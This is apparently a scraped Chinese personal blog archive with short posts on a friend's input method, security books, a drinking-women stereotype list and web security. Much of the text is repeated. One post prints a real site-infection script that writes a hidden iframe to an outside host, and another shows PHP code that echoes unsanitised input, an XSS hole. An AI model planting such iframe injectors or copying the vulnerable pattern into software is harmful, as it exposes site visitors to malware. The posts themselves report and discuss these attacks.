May
12
我同学开发了一个输入法,绿色的,.net 版,试用了一下很好用,不过他说在内测,还很弱,不过目前来说还是很好的。欢迎大家测试。
输入汉字界面:
输入技巧:shift键可切换中英文。
设置界面:
下载:
下载文件 (已下载 316 次)
我自己不知道输入法怎么开发的,不知道这东西好开发不。。。欢迎添砖!
输入汉字界面:
输入技巧:shift键可切换中英文。
设置界面:
下载:
下载文件 (已下载 316 次)我自己不知道输入法怎么开发的,不知道这东西好开发不。。。欢迎添砖!
May
9
May
9
帮同学做了个网站,给了几百块钱,全买书了。。哦也。。。以后让帮忙直接给我买书邮过来就行了,不用给钱了。。特别是在不到十个人的朋友群里喊了一句:0day 换书啦。。。居然没人理。。哈哈。
买了如下几本,不知道怎么样,也不知道有时间学完不,先买来再说,有时间就瞧。。反正把钱花在书了,就不会花在别处浪费了。嗯,想法很好。嘿嘿。。看书:
大家有啥好书,给俺推荐一下。本人急需要补充知识!
买了如下几本,不知道怎么样,也不知道有时间学完不,先买来再说,有时间就瞧。。反正把钱花在书了,就不会花在别处浪费了。嗯,想法很好。嘿嘿。。看书:
引用
深入解析Windows操作系统:第4版:Microsoft Windows Server 2003/Windows XP/Windows 2000技术内幕
http://product.dangdang.com/product.aspx?product_id=9275124
Ajax高级程序设计(第2版)
http://product.dangdang.com/product.aspx?product_id=20274355
精通正则表达式(第3版)(Mastering Regular Expressions)
http://product.dangdang.com/product.aspx?product_id=20028613
AJAX安全技术
http://product.dangdang.com/product.aspx?product_id=20449093
Windows核心编程(第5版)
http://product.dangdang.com/product.aspx?product_id=20351565
JavaScript 高级程序设计
http://product.dangdang.com/product.aspx?product_id=9211839
黑客大曝光——Web应用安全机密与解决方案(第2版)
http://product.dangdang.com/product.aspx?product_id=20302244
Web安全测试
http://www.china-pub.com/12501
Web安全、隐私和商务(第二版)
http://www.china-pub.com/22441
http://product.dangdang.com/product.aspx?product_id=9275124
Ajax高级程序设计(第2版)
http://product.dangdang.com/product.aspx?product_id=20274355
精通正则表达式(第3版)(Mastering Regular Expressions)
http://product.dangdang.com/product.aspx?product_id=20028613
AJAX安全技术
http://product.dangdang.com/product.aspx?product_id=20449093
Windows核心编程(第5版)
http://product.dangdang.com/product.aspx?product_id=20351565
JavaScript 高级程序设计
http://product.dangdang.com/product.aspx?product_id=9211839
黑客大曝光——Web应用安全机密与解决方案(第2版)
http://product.dangdang.com/product.aspx?product_id=20302244
Web安全测试
http://www.china-pub.com/12501
Web安全、隐私和商务(第二版)
http://www.china-pub.com/22441
大家有啥好书,给俺推荐一下。本人急需要补充知识!
May
3
有时候会常常的想一些事情,也就会有一些想法。当身边的人随着自己不断的努力而接触更加厉害的人,自己就会觉得自己的不足与落破。也会不断的接受的不同的打击。不管怎么的努力,都无法超越一些人,不管技术还是生活,都无法满足自己所要求的,虽然要求不高。相比一些人来说,自己目前还算好的,但是往上看的话,再相比一些人,自己真的不算什么。。。。。
不知道以后会怎样。。。。。。。我想的太多了!
不知道以后会怎样。。。。。。。我想的太多了!
Apr
30
貌似很准确的说,因为这是一个女人总结的。。
引用
关于女人与酒有三句经典话语:一般的女人不喝酒,女人不喝一般的酒,喝酒的女人不一般。
女人饮酒是道靓丽风景,就和女人抽烟一样,有那么一点不寻常,也更加吸引人们的眼光。男人对喝酒的女人总有一点异样的感觉,有点喜欢又有点怕,因为男人明白,女人不喝则矣,若真喝酒的女人,男人又有点惧怕,赢不漂亮输不光彩。可是在酒桌上最能看出女人的性格:
一类:酒到杯干,来者不拒的女人。属于豪放女性,个性泼辣,是极好的红颜知己。
二类:滴酒不沾的女人。是标准淑女,一旦用情绝对专一。
三类:喝的不多装醉的女人。是聪明女,自我控制极佳,做事讲究手段,目的性很强。
四类:自己不喝却想灌醉别人的女人。这样的女人如果再有一副娇好的容貌,对男人将是致命武器。
五类:不该醉偏醉的女人。麻烦女人,易动感情,爱闹的天翻地覆。
六类:该醉不醉的女人。是冷静女人,性格坚强,孤芳自赏。观察力敏锐,能洞透男人的心灵。
七类:失意喝酒的女人,是脆弱的女人。易受伤,尤其对感情拿的起放不下。
八类:得意时猛喝酒的女人,是矛盾女人。 外冷内热,热如火山 。
喝酒时看女人更准确,女人喝酒也很美。纤手持高脚杯,浅斟慢饮。两腮绯红,双眸一泓醉意,温柔中揉入了娇媚,忧伤中又让男人感到那么楚楚可怜。喝酒的女人总是多一点点特别,也多了对生活的品味。
女人饮酒是道靓丽风景,就和女人抽烟一样,有那么一点不寻常,也更加吸引人们的眼光。男人对喝酒的女人总有一点异样的感觉,有点喜欢又有点怕,因为男人明白,女人不喝则矣,若真喝酒的女人,男人又有点惧怕,赢不漂亮输不光彩。可是在酒桌上最能看出女人的性格:
一类:酒到杯干,来者不拒的女人。属于豪放女性,个性泼辣,是极好的红颜知己。
二类:滴酒不沾的女人。是标准淑女,一旦用情绝对专一。
三类:喝的不多装醉的女人。是聪明女,自我控制极佳,做事讲究手段,目的性很强。
四类:自己不喝却想灌醉别人的女人。这样的女人如果再有一副娇好的容貌,对男人将是致命武器。
五类:不该醉偏醉的女人。麻烦女人,易动感情,爱闹的天翻地覆。
六类:该醉不醉的女人。是冷静女人,性格坚强,孤芳自赏。观察力敏锐,能洞透男人的心灵。
七类:失意喝酒的女人,是脆弱的女人。易受伤,尤其对感情拿的起放不下。
八类:得意时猛喝酒的女人,是矛盾女人。 外冷内热,热如火山 。
喝酒时看女人更准确,女人喝酒也很美。纤手持高脚杯,浅斟慢饮。两腮绯红,双眸一泓醉意,温柔中揉入了娇媚,忧伤中又让男人感到那么楚楚可怜。喝酒的女人总是多一点点特别,也多了对生活的品味。
Apr
28
好像最近大家对 json xss 不是太热,Google有过一次:http://ha.ckers.org/blog/20060704/cross-site-scripting-vulnerability-in-google/
好像大牛们早就知道这种了。
那么防范这样的XSS也是很容易的,比如有XSS漏洞的页面是这样的:
当然了,具体应用时更为复杂,修补方法很简单,开发人员可以改成如下这样:
好像大牛们早就知道这种了。
那么防范这样的XSS也是很容易的,比如有XSS漏洞的页面是这样的:
<?PHP
$woyigui = $_GET["xss"];
echo $woyigui;
?>
$woyigui = $_GET["xss"];
echo $woyigui;
?>
当然了,具体应用时更为复杂,修补方法很简单,开发人员可以改成如下这样:
Apr
27
朋友的网被挂马,看了一下,是这样的:
这年头挂马也知道防范呀!
if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=http://www.wansf.net/a10/a10.htm></iframe>")
document.write("</div>")}
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=http://www.wansf.net/a10/a10.htm></iframe>")
document.write("</div>")}
这年头挂马也知道防范呀!
Apr
27
昨天那篇blog,有人说在zhuaxia下面会XSS,因为我不太用抓虾,不是太了解。关于这个问题,本以为是标签闭合的源故,左测试右测试,最后原因是因为抓虾本身就没什么过滤。听听朋友汗心的话:
[郑州]-woyigui 14:59:03
可以XSS。\?
[洛阳]-M.K4<shellcoder@126.com> 14:59:47
其他的blog都可以..就wordpress不行..
[郑州]-woyigui 14:59:57
[洛阳]-M.K4<shellcoder@126.com> 15:00:38
最早的时候是用抓虾浏览童童的blog..sohu的..一篇文章是xss测试语句大全..然后直接把我IE给卡死鸟
[郑州]-woyigui 15:01:03
[郑州]-woyigui 15:01:18
这么说的话,抓虾很烂了。。
[洛阳]-M.K4<shellcoder@126.com> 15:02:13
所以我现在用google reader
[郑州]-woyigui 15:02:23
[洛阳]-M.K4<shellcoder@126.com> 15:02:38
但是抓虾功能很多
[郑州]-woyigui 15:02:52
多有毛用。。
[洛阳]-M.K4<shellcoder@126.com> 15:02:56
可以给文章加标签啥的.很方便..
可以XSS。\?
[洛阳]-M.K4<shellcoder@126.com> 14:59:47
其他的blog都可以..就wordpress不行..
[郑州]-woyigui 14:59:57
[洛阳]-M.K4<shellcoder@126.com> 15:00:38
最早的时候是用抓虾浏览童童的blog..sohu的..一篇文章是xss测试语句大全..然后直接把我IE给卡死鸟
[郑州]-woyigui 15:01:03
[郑州]-woyigui 15:01:18
这么说的话,抓虾很烂了。。
[洛阳]-M.K4<shellcoder@126.com> 15:02:13
所以我现在用google reader
[郑州]-woyigui 15:02:23
[洛阳]-M.K4<shellcoder@126.com> 15:02:38
但是抓虾功能很多
[郑州]-woyigui 15:02:52
多有毛用。。
[洛阳]-M.K4<shellcoder@126.com> 15:02:56
可以给文章加标签啥的.很方便..
